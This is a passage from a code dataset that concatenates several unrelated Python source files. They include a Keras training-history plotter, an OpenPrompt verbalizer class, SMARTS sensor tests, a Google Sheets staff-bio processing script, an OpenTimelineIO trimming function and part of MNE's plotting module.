if 'lr' in self._history_keys and isNotNone(self._learning_rates):
self.LearningPlot( fig_num = fig_num,
title = 'Model Learning Rate')
fig_num += 1
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.DirectPlotHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def OldPlotHistory(self):
"""
This method plot the history in the old way.
"""
try:
fig_num:int = 1
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model loss',
metric = 'loss',
axis_labels = ['train', 'validation'],
history_labels = ['Loss', 'Epoch'],
extender = 'loss_epoch_plot')
fig_num += 1
if 'acc' in self._history_keys:
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Accuracy',
metric = 'acc',
axis_labels = ['train', 'validation'],
history_labels = ['Accuracy', 'Epoch'],
extender = 'accuracy_epoch_plot')
fig_num += 1
if 'top_k_categorical_accuracy' in self._history_keys:
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Top k Categorical Accuracy',
metric = 'top_k_categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Top k Categorical Accuracy', 'Epoch'],
extender = 'top_k_categoriacal_epoch_plot')
fig_num += 1
if 'categorical_accuracy' in self._history_keys:
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Categorical Accuracy',
metric = 'categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Categorical Accuracy', 'Epoch'],
extender = 'categoriacal_epoch_plot')
fig_num += 1
if 'lr' in self._history_keys:
self.LearningPlot( fig_num = fig_num,
title = 'Model Learning Rate')
fig_num += 1
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.OldPlotHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def AccOrLossPlot(self, fig_num:int, title:str, metric:str, axis_labels:list = ['train', 'validation'], history_labels:list = ['Metric', 'Epoch'], extender:str = '_epoch_plot', train_val_lists:list = None):
"""
This method wrapp the plot creation for a single metric of the keras train history.
:param fig_num:int: figure number
:param title:str: figure title
:param metric:str: desired metric
:param axis_labels:list: axis labels
:param history_labels:list: history labels
:param extender:str: plot file name extender
:param train_val_lists:list: a list containing the train and validation list of a defined metric
"""
try:
figure = plt.figure(fig_num)
plt.suptitle(title, fontsize=14, fontweight='bold')
if metric == 'loss': plt.title(self.CalcResultLoss(history=self._history))
else: plt.title(self.CalcResultAccuracy(history=self._history, metric=metric))
if not self._new_style:
plt.plot(self._history.history[metric], color='blue', label=axis_labels[0])
plt.plot(self._history.history['val_' + metric], color='orange', label=axis_labels[1])
else:
if (train_val_lists != None) and (len(train_val_lists) == 2):
for l in train_val_lists[0]: plt.plot(self._epochs, self._history.history[l], color='b', label='Training ' + metric + ' (' + str(format(self._history.history[l][-1],'.5f'))+')')
for l in train_val_lists[1]: plt.plot(self._epochs, self._history.history[l], color='g', label='Validation ' + metric + ' (' + str(format(self._history.history[l][-1],'.5f'))+')')
plt.ylabel(history_labels[0])
plt.xlabel(history_labels[1])
plt.legend(axis_labels, loc='lower right')
if self._save_it:
PlotSaver(self._model_description, figure).SavePyPlotToFile(extender=extender)
else:
plt.show()
figure.clf()
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.AccOrLossPlot]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def LearningPlot(self, fig_num:int, title:str = 'Model Learning Rate', metric:str = 'lr', axis_labels:list = ['train', 'validation'], history_labels:list = ['Learning Rate', 'Epoch'], extender:str = 'learning_rate_epoch_plot'):
"""
This method plot a the single learning rate curve.
:param fig_num:int: figure number
:param title:str: figure title
:param metric:str: desired metric
:param axis_labels:list: axis labels
:param history_labels:list: history labels
:param extender:str: plot file name extender
"""
try:
figure = plt.figure(fig_num)
plt.suptitle(title, fontsize=14, fontweight='bold')
plt.title(self.CalcResultLearnRate(history=self._history))
if not self._new_style:
plt.plot(self._history.history[metric], color='red', label='learning rate')
else:
for l in self._learning_rates: plt.plot(self._epochs, self._history.history[l], color='r', label='Learning Rate (' + str(format(self._history.history[l][-1],'.5f'))+')')
plt.ylabel(history_labels[0])
plt.xlabel(history_labels[1])
plt.legend(axis_labels, loc='upper right')
if self._save_it:
PlotSaver(self._model_description, figure).SavePyPlotToFile(extender='learning_rate_epoch_plot')
else:
plt.show()
figure.clf()
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.LearningPlot]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CalcResultAccuracy(self, history, metric:str = 'acc'):
"""
This method show the train acc results.
:param history: history of the training
"""
try:
return "Training accuracy: %.2f%% / Validation accuracy: %.2f%%" % (100*history.history[metric][-1], 100*history.history['val_'+metric][-1])
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CalcResultAccuracy]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CalcResultLoss(self, history):
"""
This method show the train loss results.
:param history: history of the training
"""
try:
return 'Training loss: '+ str(history.history['loss'][-1])[:-6] +' / Validation loss: ' + str(history.history['val_loss'][-1])[:-6]
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CalcResultLoss]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CalcResultLearnRate(self, history):
"""
This method show the train learn rate.
:param history: history of the training
"""
try:
return 'Training Learn Rate: '+ str(history.history['lr'][-1])
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CalcResultLearnRate]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
| 48.365979 | 231 | 0.553981 | [
"MIT"
] | ReleasedBrainiac/GraphToSequenceNN | Scripts/Plotter/PlotHistory.py | 18,766 | Python |
import json
from transformers.tokenization_utils import PreTrainedTokenizer
from yacs.config import CfgNode
from openprompt.data_utils import InputFeatures
import re
from openprompt import Verbalizer
from typing import *
import torch
import torch.nn as nn
import torch.nn.functional as F
from openprompt.utils.logging import logger
class One2oneVerbalizer(Verbalizer):
r"""
The basic manually defined verbalizer class, this class is inherited from the :obj:`Verbalizer` class.
This class restrict the use of label words to one words per label. For a verbalzer with less constraints,
please use Basic ManualVerbalizer.
Args:
tokenizer (:obj:`PreTrainedTokenizer`): The tokenizer of the current pre-trained model to point out the vocabulary.
classes (:obj:`classes`): The classes (or labels) of the current task.
num_classes (:obj:`int`): Optional. The number of classes of the verbalizer. Only one of `classes` and `num_classes` should be used.
label_words (:obj:`Union[Sequence[str], Mapping[str, str]]`, optional): The label words that are projected by the labels.
prefix (:obj:`str`, optional): The prefix string of the verbalizer. (used in PLMs like RoBERTa, which is sensitive to prefix space)
multi_token_handler (:obj:`str`, optional): The handling strategy for multiple tokens produced by the tokenizer.
post_log_softmax (:obj:`bool`, optional): Whether to apply log softmax post processing on label_logits. Default to True.
"""
def __init__(self,
tokenizer: PreTrainedTokenizer,
num_classes: Optional[int] = None,
classes: Optional[List] = None,
label_words: Optional[Union[Sequence[str], Mapping[str, str]]] = None,
prefix: Optional[str] = " ",
multi_token_handler: Optional[str] = "first",
post_log_softmax: Optional[bool] = True,
):
super().__init__(tokenizer=tokenizer, num_classes=num_classes, classes=classes)
self.prefix = prefix
self.multi_token_handler = multi_token_handler
self.label_words = label_words
self.post_log_softmax = post_log_softmax
def on_label_words_set(self):
super().on_label_words_set()
self.label_words = self.add_prefix(self.label_words, self.prefix)
self.generate_parameters()
@staticmethod
def add_prefix(label_words, prefix):
r"""Add prefix to label words. For example, if a label words is in the middle of a template,
the prefix should be ``' '``.
Args:
label_words (:obj:`Union[Sequence[str], Mapping[str, str]]`, optional): The label words that are projected by the labels.
prefix (:obj:`str`, optional): The prefix string of the verbalizer.
Returns:
:obj:`Sequence[str]`: New label words with prefix.
"""
new_label_words = []
if isinstance(label_words[0], list):
assert max([len(w) for w in label_words]) == 1, "Providing multiple label words, you should use other verbalizers instead."
label_words = [w[0] for w in label_words]
for word in label_words:
if word.startswith("<!>"):
new_label_words.append(word.split("<!>")[1])
else:
new_label_words.append(prefix + word)
return new_label_words
def generate_parameters(self) -> List:
r"""In basic manual template, the parameters are generated from label words directly.
In this implementation, the label_words should not be tokenized into more than one token.
"""
words_ids = []
for word in self.label_words:
word_ids = self.tokenizer.encode(word, add_special_tokens=False)
if len(word_ids) > 1:
logger.warning("Word {} is split into multiple tokens: {}. \
If this is not what you expect, try using another word for this verbalizer" \
.format(word, self.tokenizer.convert_ids_to_tokens(word_ids)))
words_ids.append(word_ids)
max_len = max([len(ids) for ids in words_ids])
words_ids_mask = [[1]*len(ids) + [0]*(max_len-len(ids)) for ids in words_ids]
words_ids = [ids+[0]*(max_len-len(ids)) for ids in words_ids]
words_ids_tensor = torch.tensor(words_ids)
words_ids_mask = torch.tensor(words_ids_mask)
self.label_words_ids = nn.Parameter(words_ids_tensor, requires_grad=False)
self.label_words_mask = nn.Parameter(words_ids_mask, requires_grad=False)
def project(self,
logits: torch.Tensor,
**kwargs,
) -> torch.Tensor:
r"""
Project the labels, the return value is the normalized (sum to 1) probs of label words.
Args:
logits (:obj:`torch.Tensor`): The orginal logits of label words.
Returns:
:obj:`torch.Tensor`: The normalized logits of label words
"""
label_words_logits = logits[:, self.label_words_ids]
label_words_logits = self.handle_multi_token(label_words_logits, self.label_words_mask)
return label_words_logits
def process_logits(self, logits: torch.Tensor, **kwargs):
r"""A whole framework to process the original logits over the vocabulary, which contains four steps:
(1) Project the logits into logits of label words
if self.post_log_softmax is True:
(2) Normalize over all label words
(3) Calibrate (optional)
Args:
logits (:obj:`torch.Tensor`): The orginal logits.
Returns:
(:obj:`torch.Tensor`): The final processed logits over the label words set.
"""
# project
label_words_logits = self.project(logits, **kwargs) #Output: (batch_size, num_classes) or (batch_size, num_classes, num_label_words_per_label)
if self.post_log_softmax:
# normalize
label_words_probs = self.normalize(label_words_logits)
# calibrate
if hasattr(self, "_calibrate_logits") and self._calibrate_logits is not None:
label_words_probs = self.calibrate(label_words_probs=label_words_probs)
# convert to logits
label_words_logits = torch.log(label_words_probs+1e-15)
return label_words_logits
def normalize(self, logits: torch.Tensor) -> torch.Tensor:
"""
Given logits regarding the entire vocabulary, return the probs over the label words set.
Args:
logits (:obj:`Tensor`): The logits over the entire vocabulary.
Returns:
:obj:`Tensor`: The logits over the label words set.
"""
batch_size = logits.shape[0]
return F.softmax(logits.reshape(batch_size, -1), dim=-1).reshape(*logits.shape)
def calibrate(self, label_words_probs: torch.Tensor, **kwargs) -> torch.Tensor:
r"""
Args:
label_words_probs (:obj:`torch.Tensor`): The probability distribution of the label words with the shape of [``batch_size``, ``num_classes``, ``num_label_words_per_class``]
Returns:
:obj:`torch.Tensor`: The calibrated probability of label words.
"""
shape = label_words_probs.shape
assert self._calibrate_logits.dim() == 1, "self._calibrate_logits are not 1-d tensor"
calibrate_label_words_probs = self.normalize(self.project(self._calibrate_logits.unsqueeze(0), **kwargs))
assert calibrate_label_words_probs.shape[1:] == label_words_probs.shape[1:] \
and calibrate_label_words_probs.shape[0]==1, "shape not match"
label_words_probs /= (calibrate_label_words_probs+1e-15)
# normalize # TODO Test the performance
norm = label_words_probs.reshape(shape[0], -1).sum(dim=-1,keepdim=True) # TODO Test the performance of detaching()
label_words_probs /= norm
return label_words_probs
| 42.146597 | 183 | 0.652422 | [
"Apache-2.0"
] | BIT-ENGD/OpenPrompt | openprompt/prompts/one2one_verbalizer.py | 8,050 | Python |
# MIT License
#
# Copyright (C) 2021. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from unittest import mock
import numpy as np
import pytest
from helpers.scenario import temp_scenario
from smarts.core.agent_interface import AgentInterface
from smarts.core.coordinates import Heading, Pose
from smarts.core.plan import Plan
from smarts.core.scenario import Scenario
from smarts.core.sensors import DrivenPathSensor, WaypointsSensor
from smarts.sstudio import gen_scenario
from smarts.sstudio import types as t
AGENT_ID = "Agent-007"
def test_driven_path_sensor():
vehicle = mock.Mock()
sim = mock.Mock()
max_path_length = 5
sensor = DrivenPathSensor(vehicle, max_path_length=max_path_length)
positions = [(x, 0, 0) for x in range(0, 100, 10)]
sim_times = list(range(0, 50, 5))
for idx, (position, sim_time) in enumerate(zip(positions, sim_times)):
sim.elapsed_sim_time = sim_time
vehicle.position = position
sensor.track_latest_driven_path(sim)
if idx >= 3:
assert sensor.distance_travelled(sim, last_n_steps=3) == 30
assert sensor.distance_travelled(sim, last_n_seconds=10) == 20
assert len(sensor()) <= max_path_length
sensor.teardown()
@pytest.fixture
def scenarios():
with temp_scenario(name="straight", map="maps/6lane.net.xml") as scenario_root:
ego_missions = [
t.Mission(
t.Route(
begin=("edge-west-WE", 0, 10),
end=("edge-east-WE", 0, "max"),
)
),
]
gen_scenario(
t.Scenario(ego_missions=ego_missions),
output_dir=scenario_root,
)
yield Scenario.variations_for_all_scenario_roots(
[str(scenario_root)], [AGENT_ID]
)
def test_waypoints_sensor(scenarios):
scenario = next(scenarios)
sim = mock.Mock()
vehicle = mock.Mock()
vehicle.pose = Pose(
position=np.array([33, -65, 0]),
orientation=[0, 0, 0, 0],
heading_=Heading(0),
)
mission = scenario.missions[AGENT_ID]
plan = Plan(scenario.road_map, mission)
sensor = WaypointsSensor(vehicle, plan)
waypoints = sensor()
assert len(waypoints) == 3
| 33.24 | 83 | 0.690734 | [
"MIT"
] | ehtnamuh/Smarts-Fork | smarts/core/tests/test_sensors.py | 3,324 | Python |
from PIL import Image
import gspread
import hashlib
from googleapiclient.errors import HttpError
from oauth2client.service_account import ServiceAccountCredentials
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from googleapiclient.http import MediaIoBaseDownload
import io
import json
def has_transparency(image: Image) -> bool:
if image.mode == "P":
transparent = image.info.get("transparency", -1)
for _, index in image.getcolors():
if index == transparent:
return True
elif image.mode == "RGBA":
extrema = image.getextrema()
if extrema[3][0] < 255:
return True
return False
# from https://stackoverflow.com/questions/61201141/how-can-i-crop-an-image-with-11-aspect-ratio-using-pillow-in-python
def crop_image(image):
width, height = image.size
if width == height:
return image
offset = int(abs(height - width) / 2)
if width > height:
image = image.crop([offset, 0, width - offset, height])
else:
image = image.crop([0, offset, width, height - offset])
return image
def resize_image(image):
width, height = image.size
new_width = 256
if width < new_width:
return image
new_height = new_width * height / width
return image.resize((new_width, int(new_height)), Image.ANTIALIAS)
def LongestBio(section: list) -> int:
longestBio = 0
for items in section:
if longestBio < len(items["description"]):
longestBio = len(items["description"])
return longestBio
def sortBioLength(bioList: list) -> list:
holdingList = []
workingList = bioList
for x in range(len(workingList)):
highest = LongestBio(workingList)
itemIndex = -1
for items in workingList:
itemIndex = itemIndex + 1
if len(items["description"]) == highest:
holdingList.append(items)
break
if itemIndex != -1:
del workingList[itemIndex]
return holdingList
# Deals with getting all the auth setup for the connecting to GSheet
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
# Needs to link to auth file given by google dev dashboard
creds = ServiceAccountCredentials.from_json_keyfile_name("secrets/googleAuth.json", scope)
client = gspread.authorize(creds)
sheet = client.open("Low Ink Staff Bio Form (Responses)") # Name of the google sheet file
worksheet = sheet.worksheet("input") # name of the sheet in question
worksheetData = worksheet.get_all_records()
# This is the auth scope for Google Drive API
creds = None
if os.path.exists('secrets/token.pickle'):
with open('secrets/token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'secrets/credentials.json', ['https://www.googleapis.com/auth/drive'])
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('secrets/token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('drive', 'v3', credentials=creds)
commentator = []
former = []
headTO = []
orgHead = []
production = []
staff = []
artists = []
for lines in worksheetData:
output = {}
if lines["isStaff"] in ["Yes (Staff temp invite)", "Yes", "Yes (Staff, temp, invite)"]:
print("Outputting for: {}".format(lines["name"]))
staffID = hashlib.md5(lines["name"].encode("utf-8")).hexdigest()
# Obtains image from google drive
imageID = (lines["image"].split("?id="))[1] # get the G Drive file ID from share
request = service.files().get_media(fileId=imageID)
fh = io.FileIO("holding/{}.png".format(staffID), "wb") # states where the file saves to
# Downloads file
downloader = MediaIoBaseDownload(fh, request)
output_file_format = 'png'
done = False
while done is False:
try:
status, done = downloader.next_chunk()
except HttpError as e:
print("Could not output image. Please provide file '{}' manually.".format("output/images/{}.png").format(staffID))
print("Error message: '{}'".format(e.error_details[0]["message"]))
break
if done is True:
# Crops image to be 1:1
staff_image = crop_image(Image.open("holding/{}.png".format(staffID)))
staff_image = resize_image(staff_image)
if has_transparency(staff_image):
staff_image.convert("P", palette=Image.ADAPTIVE).save("output/images/{}.png".format(staffID))
else:
staff_image.convert("RGB", palette=Image.ADAPTIVE).save("output/images/{}.jpg".format(staffID))
output_file_format = 'jpg'
staff_image.close()
output = {
"title": lines["name"],
"description": (lines["bio"].replace("\n", "")).replace("\r", " "),
"imagePath": "images/Staff/{}.{}".format(staffID, output_file_format),
"twitter": lines["twitter"],
"credit": lines["credits"]
}
# Save bio to right list
if lines["header"] == "General Staff":
staff.append(output)
elif lines["header"] == "Commentators":
commentator.append(output)
elif lines["header"] == "Head TO":
headTO.append(output)
elif lines["header"] == "Production & Development":
production.append(output)
elif lines["header"] == "Org Head":
orgHead.append(output)
elif lines["header"] == "Temp staff":
staff.append(output)
elif lines["header"] == "Former staff":
former.append(output)
elif lines["header"] == "Guest Staff":
staff.append(output)
elif lines["header"] == "Artist":
artists.append(output)
staffFile = [
{"elemClassName": "staff-layout-grid",
"contents": sortBioLength(staff)},
{"elemClassName": "org-head-grid",
"contents": sortBioLength(orgHead)},
{"elemClassName": "head-TO-grid",
"contents": sortBioLength(headTO)},
{"elemClassName": "production-grid",
"contents": sortBioLength(production)},
{"elemClassName": "commentator-grid",
"contents": sortBioLength(commentator)},
{"elemClassName": "former-staff-grid",
"contents": sortBioLength(former)},
{"elemClassName": "artists-staff-grid",
"contents": sortBioLength(artists)}
]
with open('output/staff.json', 'w') as file:
json.dump(staffFile, file)
| 36.223958 | 130 | 0.63005 | [
"MIT"
] | IPL-Splat/IPL-Splat.github.io | dataProcessor/processBio.py | 6,955 | Python |
#
# Copyright Contributors to the OpenTimelineIO project
#
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
#
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
#
# You may obtain a copy of the Apache License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
#
"""Algorithms for timeline objects."""
import copy
from . import (
track_algo
)
def timeline_trimmed_to_range(in_timeline, trim_range):
"""Returns a new timeline that is a copy of the in_timeline, but with items
outside the trim_range removed and items on the ends trimmed to the
trim_range. Note that the timeline is never expanded, only shortened.
Please note that you could do nearly the same thing non-destructively by
just setting the Track's source_range but sometimes you want to really cut
away the stuff outside and that's what this function is meant for."""
new_timeline = copy.deepcopy(in_timeline)
for track_num, child_track in enumerate(in_timeline.tracks):
# @TODO: put the trim_range into the space of the tracks
# new_range = new_timeline.tracks.transformed_time_range(
# trim_range,
# child_track
# )
# trim the track and assign it to the new stack.
new_timeline.tracks[track_num] = track_algo.track_trimmed_to_range(
child_track,
trim_range
)
return new_timeline
| 38.877193 | 79 | 0.733303 | [
"Apache-2.0"
] | AWhetter/OpenTimelineIO | src/py-opentimelineio/opentimelineio/algorithms/timeline_algo.py | 2,216 | Python |
# -*- coding: utf-8 -*-
"""Functions to make simple plots with M/EEG data."""
# Authors: Alexandre Gramfort <[email protected]>
# Denis Engemann <[email protected]>
# Martin Luessi <[email protected]>
# Eric Larson <[email protected]>
# Cathy Nangini <[email protected]>
# Mainak Jas <[email protected]>
#
# License: Simplified BSD
import base64
import copy
from glob import glob
from io import BytesIO
from itertools import cycle
import os.path as op
import warnings
from distutils.version import LooseVersion
from collections import defaultdict
import numpy as np
from scipy import linalg
from ..defaults import DEFAULTS
from ..fixes import _get_img_fdata
from ..rank import compute_rank
from ..source_space import _mri_orientation
from ..surface import read_surface
from ..io.constants import FIFF
from ..io.proj import make_projector
from ..io.pick import (_DATA_CH_TYPES_SPLIT, pick_types, pick_info,
pick_channels)
from ..source_space import (read_source_spaces, SourceSpaces, _read_mri_info,
_check_mri, _ensure_src)
from ..transforms import invert_transform, apply_trans, _frame_to_str
from ..utils import (logger, verbose, warn, _check_option, get_subjects_dir,
_mask_to_onsets_offsets, _pl, _on_missing)
from ..io.pick import _picks_by_type
from ..filter import estimate_ringing_samples
from .utils import tight_layout, _get_color_list, _prepare_trellis, plt_show
def _index_info_cov(info, cov, exclude):
if exclude == 'bads':
exclude = info['bads']
info = pick_info(info, pick_channels(info['ch_names'], cov['names'],
exclude))
del exclude
picks_list = \
_picks_by_type(info, meg_combined=False, ref_meg=False,
exclude=())
picks_by_type = dict(picks_list)
ch_names = [n for n in cov.ch_names if n in info['ch_names']]
ch_idx = [cov.ch_names.index(n) for n in ch_names]
info_ch_names = info['ch_names']
idx_by_type = defaultdict(list)
for ch_type, sel in picks_by_type.items():
idx_by_type[ch_type] = [ch_names.index(info_ch_names[c])
for c in sel if info_ch_names[c] in ch_names]
idx_names = [(idx_by_type[key],
'%s covariance' % DEFAULTS['titles'][key],
DEFAULTS['units'][key],
DEFAULTS['scalings'][key],
key)
for key in _DATA_CH_TYPES_SPLIT
if len(idx_by_type[key]) > 0]
C = cov.data[ch_idx][:, ch_idx]
return info, C, ch_names, idx_names
@verbose
def plot_cov(cov, info, exclude=(), colorbar=True, proj=False, show_svd=True,
show=True, verbose=None):
"""Plot Covariance data.
Parameters
----------
cov : instance of Covariance
The covariance matrix.
info : dict
Measurement info.
exclude : list of str | str
List of channels to exclude. If empty do not exclude any channel.
If 'bads', exclude info['bads'].
colorbar : bool
Show colorbar or not.
proj : bool
Apply projections or not.
show_svd : bool
Plot also singular values of the noise covariance for each sensor
type. We show square roots ie. standard deviations.
show : bool
Show figure if True.
%(verbose)s
Returns
-------
fig_cov : instance of matplotlib.figure.Figure
The covariance plot.
fig_svd : instance of matplotlib.figure.Figure | None
The SVD spectra plot of the covariance.
See Also
--------
mne.compute_rank
Notes
-----
For each channel type, the rank is estimated using
:func:`mne.compute_rank`.
.. versionchanged:: 0.19
Approximate ranks for each channel type are shown with red dashed lines.
"""
from ..cov import Covariance
import matplotlib.pyplot as plt
from matplotlib.colors import Normalize
info, C, ch_names, idx_names = _index_info_cov(info, cov, exclude)
del cov, exclude
projs = []
if proj:
projs = copy.deepcopy(info['projs'])
# Activate the projection items
for p in projs:
p['active'] = True
P, ncomp, _ = make_projector(projs, ch_names)
if ncomp > 0:
logger.info(' Created an SSP operator (subspace dimension'
' = %d)' % ncomp)
C = np.dot(P, np.dot(C, P.T))
else:
logger.info(' The projection vectors do not apply to these '
'channels.')
fig_cov, axes = plt.subplots(1, len(idx_names), squeeze=False,
figsize=(3.8 * len(idx_names), 3.7))
for k, (idx, name, _, _, _) in enumerate(idx_names):
vlim = np.max(np.abs(C[idx][:, idx]))
im = axes[0, k].imshow(C[idx][:, idx], interpolation="nearest",
norm=Normalize(vmin=-vlim, vmax=vlim),
cmap='RdBu_r')
axes[0, k].set(title=name)
if colorbar:
from mpl_toolkits.axes_grid1 import make_axes_locatable
divider = make_axes_locatable(axes[0, k])
cax = divider.append_axes("right", size="5.5%", pad=0.05)
plt.colorbar(im, cax=cax, format='%.0e')
fig_cov.subplots_adjust(0.04, 0.0, 0.98, 0.94, 0.2, 0.26)
tight_layout(fig=fig_cov)
fig_svd = None
if show_svd:
fig_svd, axes = plt.subplots(1, len(idx_names), squeeze=False,
figsize=(3.8 * len(idx_names), 3.7))
for k, (idx, name, unit, scaling, key) in enumerate(idx_names):
this_C = C[idx][:, idx]
s = linalg.svd(this_C, compute_uv=False)
this_C = Covariance(this_C, [info['ch_names'][ii] for ii in idx],
[], [], 0)
this_info = pick_info(info, idx)
this_info['projs'] = []
this_rank = compute_rank(this_C, info=this_info)
# Protect against true zero singular values
s[s <= 0] = 1e-10 * s[s > 0].min()
s = np.sqrt(s) * scaling
axes[0, k].plot(s, color='k', zorder=3)
this_rank = this_rank[key]
axes[0, k].axvline(this_rank - 1, ls='--', color='r',
alpha=0.5, zorder=4, clip_on=False)
axes[0, k].text(this_rank - 1, axes[0, k].get_ylim()[1],
'rank ≈ %d' % (this_rank,), ha='right', va='top',
color='r', alpha=0.5, zorder=4)
axes[0, k].set(ylabel=u'Noise σ (%s)' % unit, yscale='log',
xlabel='Eigenvalue index', title=name,
xlim=[0, len(s) - 1])
tight_layout(fig=fig_svd)
plt_show(show)
return fig_cov, fig_svd
def plot_source_spectrogram(stcs, freq_bins, tmin=None, tmax=None,
source_index=None, colorbar=False, show=True):
"""Plot source power in time-freqency grid.
Parameters
----------
stcs : list of SourceEstimate
Source power for consecutive time windows, one SourceEstimate object
should be provided for each frequency bin.
freq_bins : list of tuples of float
Start and end points of frequency bins of interest.
tmin : float
Minimum time instant to show.
tmax : float
Maximum time instant to show.
source_index : int | None
Index of source for which the spectrogram will be plotted. If None,
the source with the largest activation will be selected.
colorbar : bool
If true, a colorbar will be added to the plot.
show : bool
Show figure if True.
Returns
-------
fig : instance of Figure
The figure.
"""
import matplotlib.pyplot as plt
# Input checks
if len(stcs) == 0:
raise ValueError('cannot plot spectrogram if len(stcs) == 0')
stc = stcs[0]
if tmin is not None and tmin < stc.times[0]:
raise ValueError('tmin cannot be smaller than the first time point '
'provided in stcs')
if tmax is not None and tmax > stc.times[-1] + stc.tstep:
raise ValueError('tmax cannot be larger than the sum of the last time '
'point and the time step, which are provided in stcs')
# Preparing time-frequency cell boundaries for plotting
if tmin is None:
tmin = stc.times[0]
if tmax is None:
tmax = stc.times[-1] + stc.tstep
time_bounds = np.arange(tmin, tmax + stc.tstep, stc.tstep)
freq_bounds = sorted(set(np.ravel(freq_bins)))
freq_ticks = copy.deepcopy(freq_bounds)
# Reject time points that will not be plotted and gather results
source_power = []
for stc in stcs:
stc = stc.copy() # copy since crop modifies inplace
stc.crop(tmin, tmax - stc.tstep)
source_power.append(stc.data)
source_power = np.array(source_power)
# Finding the source with maximum source power
if source_index is None:
source_index = np.unravel_index(source_power.argmax(),
source_power.shape)[1]
# If there is a gap in the frequency bins record its locations so that it
# can be covered with a gray horizontal bar
gap_bounds = []
for i in range(len(freq_bins) - 1):
lower_bound = freq_bins[i][1]
upper_bound = freq_bins[i + 1][0]
if lower_bound != upper_bound:
freq_bounds.remove(lower_bound)
gap_bounds.append((lower_bound, upper_bound))
# Preparing time-frequency grid for plotting
time_grid, freq_grid = np.meshgrid(time_bounds, freq_bounds)
# Plotting the results
fig = plt.figure(figsize=(9, 6))
plt.pcolor(time_grid, freq_grid, source_power[:, source_index, :],
cmap='Reds')
ax = plt.gca()
ax.set(title='Source power', xlabel='Time (s)', ylabel='Frequency (Hz)')
time_tick_labels = [str(np.round(t, 2)) for t in time_bounds]
n_skip = 1 + len(time_bounds) // 10
for i in range(len(time_bounds)):
if i % n_skip != 0:
time_tick_labels[i] = ''
ax.set_xticks(time_bounds)
ax.set_xticklabels(time_tick_labels)
plt.xlim(time_bounds[0], time_bounds[-1])
plt.yscale('log')
ax.set_yticks(freq_ticks)
ax.set_yticklabels([np.round(freq, 2) for freq in freq_ticks])
plt.ylim(freq_bounds[0], freq_bounds[-1])
plt.grid(True, ls='-')
if colorbar:
plt.colorbar()
tight_layout(fig=fig)
# Covering frequency gaps with horizontal bars
for lower_bound, upper_bound in gap_bounds:
plt.barh(lower_bound, time_bounds[-1] - time_bounds[0], upper_bound -
lower_bound, time_bounds[0], color='#666666')
plt_show(show)
return fig
def _plot_mri_contours(mri_fname, surfaces, src, orientation='coronal',
slices=None, show=True, show_indices=False,
show_orientation=False, img_output=False):
"""Plot BEM contours on anatomical slices."""
import matplotlib.pyplot as plt
from matplotlib import patheffects
# For ease of plotting, we will do everything in voxel coordinates.
_check_option('orientation', orientation, ('coronal', 'axial', 'sagittal'))
# Load the T1 data
_, vox_mri_t, _, _, _, nim = _read_mri_info(
mri_fname, units='mm', return_img=True)
mri_vox_t = invert_transform(vox_mri_t)['trans']
del vox_mri_t
# plot axes (x, y, z) as data axes
